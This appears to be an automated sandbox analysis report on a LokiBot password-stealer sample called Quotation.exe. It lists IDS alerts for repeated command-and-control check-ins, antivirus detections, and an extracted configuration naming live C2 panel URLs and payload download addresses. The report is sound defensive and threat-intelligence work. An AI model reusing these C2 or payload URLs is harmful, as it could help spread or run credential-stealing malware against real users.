2024-12-02T14:48:24.582221+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50025	104.21.57.140	80	TCP
2024-12-02T14:48:26.191428+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50031	104.21.57.140	80	TCP
2024-12-02T14:48:27.863216+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50034	104.21.57.140	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T14:46:27.824606+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49703	104.21.57.140	80	TCP
2024-12-02T14:46:29.772994+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49709	104.21.57.140	80	TCP
2024-12-02T14:46:31.365226+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49710	104.21.57.140	80	TCP
2024-12-02T14:46:33.110694+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49716	104.21.57.140	80	TCP
2024-12-02T14:46:34.837853+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49722	104.21.57.140	80	TCP
2024-12-02T14:46:36.896166+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49723	104.21.57.140	80	TCP
2024-12-02T14:46:38.615373+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49730	104.21.57.140	80	TCP
2024-12-02T14:46:40.267794+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49737	104.21.57.140	80	TCP
2024-12-02T14:46:41.937967+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49745	104.21.57.140	80	TCP
2024-12-02T14:46:43.563586+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49746	104.21.57.140	80	TCP
2024-12-02T14:46:45.314614+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49752	104.21.57.140	80	TCP
2024-12-02T14:46:47.001555+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49758	104.21.57.140	80	TCP
2024-12-02T14:46:48.710341+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49764	104.21.57.140	80	TCP
2024-12-02T14:46:50.347634+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49765	104.21.57.140	80	TCP
2024-12-02T14:46:52.163009+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49771	104.21.57.140	80	TCP
2024-12-02T14:46:53.787715+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49777	104.21.57.140	80	TCP
2024-12-02T14:46:55.491152+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49781	104.21.57.140	80	TCP
2024-12-02T14:46:57.218517+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49785	104.21.57.140	80	TCP
2024-12-02T14:46:58.861315+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49790	104.21.57.140	80	TCP
2024-12-02T14:47:00.531526+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49796	104.21.57.140	80	TCP
2024-12-02T14:47:02.240374+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49800	104.21.57.140	80	TCP
2024-12-02T14:47:03.989197+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49803	104.21.57.140	80	TCP
2024-12-02T14:47:05.698802+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49809	104.21.57.140	80	TCP
2024-12-02T14:47:07.284782+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49815	104.21.57.140	80	TCP
2024-12-02T14:47:08.953661+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49818	104.21.57.140	80	TCP
2024-12-02T14:47:10.595338+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49822	104.21.57.140	80	TCP
2024-12-02T14:47:12.239800+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49828	104.21.57.140	80	TCP
2024-12-02T14:47:13.896676+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49834	104.21.57.140	80	TCP
2024-12-02T14:47:15.472435+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49836	104.21.57.140	80	TCP
2024-12-02T14:47:17.172628+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49841	104.21.57.140	80	TCP
2024-12-02T14:47:18.763775+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49847	104.21.57.140	80	TCP
2024-12-02T14:47:20.392040+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49850	104.21.57.140	80	TCP
2024-12-02T14:47:22.018417+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49854	104.21.57.140	80	TCP
2024-12-02T14:47:23.899318+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49860	104.21.57.140	80	TCP
2024-12-02T14:47:25.519040+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49867	104.21.57.140	80	TCP
2024-12-02T14:47:27.125460+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49871	104.21.57.140	80	TCP
2024-12-02T14:47:28.752703+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49875	104.21.57.140	80	TCP
2024-12-02T14:47:30.441791+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49882	104.21.57.140	80	TCP
2024-12-02T14:47:32.141392+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49887	104.21.57.140	80	TCP
2024-12-02T14:47:33.859801+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49891	104.21.57.140	80	TCP
2024-12-02T14:47:35.503758+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49895	104.21.57.140	80	TCP
2024-12-02T14:47:37.095474+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49900	104.21.57.140	80	TCP
2024-12-02T14:47:38.724665+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49906	104.21.57.140	80	TCP
2024-12-02T14:47:40.543502+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49909	104.21.57.140	80	TCP
2024-12-02T14:47:42.203055+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49914	104.21.57.140	80	TCP
2024-12-02T14:47:43.845851+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49919	104.21.57.140	80	TCP
2024-12-02T14:47:45.764255+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49925	104.21.57.140	80	TCP
2024-12-02T14:47:47.361857+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49929	104.21.57.140	80	TCP
2024-12-02T14:47:49.059293+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49933	104.21.57.140	80	TCP
2024-12-02T14:47:50.699604+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49939	104.21.57.140	80	TCP
2024-12-02T14:47:52.320146+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49943	104.21.57.140	80	TCP
2024-12-02T14:47:53.899018+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49947	104.21.57.140	80	TCP
2024-12-02T14:47:55.453881+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49952	104.21.57.140	80	TCP
2024-12-02T14:47:57.187443+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49956	104.21.57.140	80	TCP
2024-12-02T14:47:58.861617+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49961	104.21.57.140	80	TCP
2024-12-02T14:48:00.495169+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49965	104.21.57.140	80	TCP
2024-12-02T14:48:02.161788+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49971	104.21.57.140	80	TCP
2024-12-02T14:48:05.077723+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49977	104.21.57.140	80	TCP
2024-12-02T14:48:06.749601+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49983	104.21.57.140	80	TCP
2024-12-02T14:48:08.405254+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49988	104.21.57.140	80	TCP
2024-12-02T14:48:09.969317+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49992	104.21.57.140	80	TCP
2024-12-02T14:48:11.655286+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49995	104.21.57.140	80	TCP
2024-12-02T14:48:13.236851+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50001	104.21.57.140	80	TCP
2024-12-02T14:48:14.998847+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50004	104.21.57.140	80	TCP
2024-12-02T14:48:16.608052+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50006	104.21.57.140	80	TCP
2024-12-02T14:48:18.296110+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50012	104.21.57.140	80	TCP
2024-12-02T14:48:19.906175+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50016	104.21.57.140	80	TCP
2024-12-02T14:48:21.667040+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50021	104.21.57.140	80	TCP
2024-12-02T14:48:23.346752+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50025	104.21.57.140	80	TCP
2024-12-02T14:48:24.985941+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50031	104.21.57.140	80	TCP
2024-12-02T14:48:26.579169+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50034	104.21.57.140	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T14:46:25.643320+0100	2803305	3	Unknown Traffic	192.168.2.7	49701	104.21.12.202	443	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T14:46:27.824606+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49703	104.21.57.140	80	TCP
2024-12-02T14:46:29.772994+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49709	104.21.57.140	80	TCP
2024-12-02T14:46:31.365226+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49710	104.21.57.140	80	TCP
2024-12-02T14:46:33.110694+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49716	104.21.57.140	80	TCP
2024-12-02T14:46:34.837853+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49722	104.21.57.140	80	TCP
2024-12-02T14:46:36.896166+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49723	104.21.57.140	80	TCP
2024-12-02T14:46:38.615373+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49730	104.21.57.140	80	TCP
2024-12-02T14:46:40.267794+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49737	104.21.57.140	80	TCP
2024-12-02T14:46:41.937967+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49745	104.21.57.140	80	TCP
2024-12-02T14:46:43.563586+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49746	104.21.57.140	80	TCP
2024-12-02T14:46:45.314614+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49752	104.21.57.140	80	TCP
2024-12-02T14:46:47.001555+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49758	104.21.57.140	80	TCP
2024-12-02T14:46:48.710341+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49764	104.21.57.140	80	TCP
2024-12-02T14:46:50.347634+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49765	104.21.57.140	80	TCP
2024-12-02T14:46:52.163009+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49771	104.21.57.140	80	TCP
2024-12-02T14:46:53.787715+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49777	104.21.57.140	80	TCP
2024-12-02T14:46:55.491152+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49781	104.21.57.140	80	TCP
2024-12-02T14:46:57.218517+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49785	104.21.57.140	80	TCP
2024-12-02T14:46:58.861315+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49790	104.21.57.140	80	TCP
2024-12-02T14:47:00.531526+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49796	104.21.57.140	80	TCP
2024-12-02T14:47:02.240374+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49800	104.21.57.140	80	TCP
2024-12-02T14:47:03.989197+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49803	104.21.57.140	80	TCP
2024-12-02T14:47:05.698802+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49809	104.21.57.140	80	TCP
2024-12-02T14:47:07.284782+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49815	104.21.57.140	80	TCP
2024-12-02T14:47:08.953661+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49818	104.21.57.140	80	TCP
2024-12-02T14:47:10.595338+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49822	104.21.57.140	80	TCP
2024-12-02T14:47:12.239800+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49828	104.21.57.140	80	TCP
2024-12-02T14:47:13.896676+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49834	104.21.57.140	80	TCP
2024-12-02T14:47:15.472435+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49836	104.21.57.140	80	TCP
2024-12-02T14:47:17.172628+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49841	104.21.57.140	80	TCP
2024-12-02T14:47:18.763775+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49847	104.21.57.140	80	TCP
2024-12-02T14:47:20.392040+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49850	104.21.57.140	80	TCP
2024-12-02T14:47:22.018417+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49854	104.21.57.140	80	TCP
2024-12-02T14:47:23.899318+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49860	104.21.57.140	80	TCP
2024-12-02T14:47:25.519040+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49867	104.21.57.140	80	TCP
2024-12-02T14:47:27.125460+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49871	104.21.57.140	80	TCP
2024-12-02T14:47:28.752703+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49875	104.21.57.140	80	TCP
2024-12-02T14:47:30.441791+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49882	104.21.57.140	80	TCP
2024-12-02T14:47:32.141392+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49887	104.21.57.140	80	TCP
2024-12-02T14:47:33.859801+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49891	104.21.57.140	80	TCP
2024-12-02T14:47:35.503758+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49895	104.21.57.140	80	TCP
2024-12-02T14:47:37.095474+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49900	104.21.57.140	80	TCP
2024-12-02T14:47:38.724665+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49906	104.21.57.140	80	TCP
2024-12-02T14:47:40.543502+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49909	104.21.57.140	80	TCP
2024-12-02T14:47:42.203055+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49914	104.21.57.140	80	TCP
2024-12-02T14:47:43.845851+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49919	104.21.57.140	80	TCP
2024-12-02T14:47:45.764255+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49925	104.21.57.140	80	TCP
2024-12-02T14:47:47.361857+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49929	104.21.57.140	80	TCP
2024-12-02T14:47:49.059293+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49933	104.21.57.140	80	TCP
2024-12-02T14:47:50.699604+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49939	104.21.57.140	80	TCP
2024-12-02T14:47:52.320146+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49943	104.21.57.140	80	TCP
2024-12-02T14:47:53.899018+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49947	104.21.57.140	80	TCP
2024-12-02T14:47:55.453881+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49952	104.21.57.140	80	TCP
2024-12-02T14:47:57.187443+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49956	104.21.57.140	80	TCP
2024-12-02T14:47:58.861617+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49961	104.21.57.140	80	TCP
2024-12-02T14:48:00.495169+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49965	104.21.57.140	80	TCP
2024-12-02T14:48:02.161788+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49971	104.21.57.140	80	TCP
2024-12-02T14:48:05.077723+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49977	104.21.57.140	80	TCP
2024-12-02T14:48:06.749601+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49983	104.21.57.140	80	TCP
2024-12-02T14:48:08.405254+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49988	104.21.57.140	80	TCP
2024-12-02T14:48:09.969317+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49992	104.21.57.140	80	TCP
2024-12-02T14:48:11.655286+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49995	104.21.57.140	80	TCP
2024-12-02T14:48:13.236851+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50001	104.21.57.140	80	TCP
2024-12-02T14:48:14.998847+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50004	104.21.57.140	80	TCP
2024-12-02T14:48:16.608052+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50006	104.21.57.140	80	TCP
2024-12-02T14:48:18.296110+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50012	104.21.57.140	80	TCP
2024-12-02T14:48:19.906175+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50016	104.21.57.140	80	TCP
2024-12-02T14:48:21.667040+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50021	104.21.57.140	80	TCP
2024-12-02T14:48:23.346752+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50025	104.21.57.140	80	TCP
2024-12-02T14:48:24.985941+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50031	104.21.57.140	80	TCP
2024-12-02T14:48:26.579169+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50034	104.21.57.140	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://dvlref.online/BISH/PWS/fre.php	Avira URL Cloud: Label: malware
Source: https://dddotx.shop/BISH.exe8https://dddotx.shop/DLLL.dll	Avira URL Cloud: Label: malware
Source: http://dddotx.shop	Avira URL Cloud: Label: malware
Source: https://dddotx.shop/BISH.exe	Avira URL Cloud: Label: malware
Source: https://dvlref.online/BISH/PWS/fre.php	Avira URL Cloud: Label: malware
Source: https://dddotx.shop/DLLL.dll	Avira URL Cloud: Label: malware
Source: https://dddotx.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dvlref.online/BISH/PWS/fre.php"]}

Multi AV Scanner detection for submitted file

Source: Quotation.exe

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Quotation.exe

Joe Sandbox ML: detected

Source: Quotation.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.12.202:443 -> 192.168.2.7:49700 version: TLS 1.2

Source: Quotation.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: Quotation.exe, 00000002.00000002.1343184318.0000000002788000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000002.00000002.1343737275.0000000004BC0000.00000004.08000000.00040000.00000000.sdmp, Quotation.exe, 00000002.00000002.1343184318.0000000002791000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: Quotation.exe, 00000002.00000002.1343184318.0000000002788000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000002.00000002.1343737275.0000000004BC0000.00000004.08000000.00040000.00000000.sdmp, Quotation.exe, 00000002.00000002.1343184318.0000000002791000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Bish.pdb source: Quotation.exe
Source:	Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000005.00000002.2553531481.0000000000C82000.00000002.00000001.01000000.00000009.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

5_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49803 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49752 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49803 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49752 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49803 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49752 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49781 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49781 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49781 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49710 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49710 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49710 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49746 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49746 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49746 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49716 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49716 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49703 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49765 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49752 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49834 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49834 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49752 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49834 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49737 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49737 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49737 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49875 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49722 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49875 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49722 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49758 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49765 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49758 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49765 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49834 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49867 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49737 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49867 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49737 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49867 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49703 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49703 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49834 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49891 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49875 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49722 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49771 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49723 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49771 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49746 -> 104.21.57.140:80
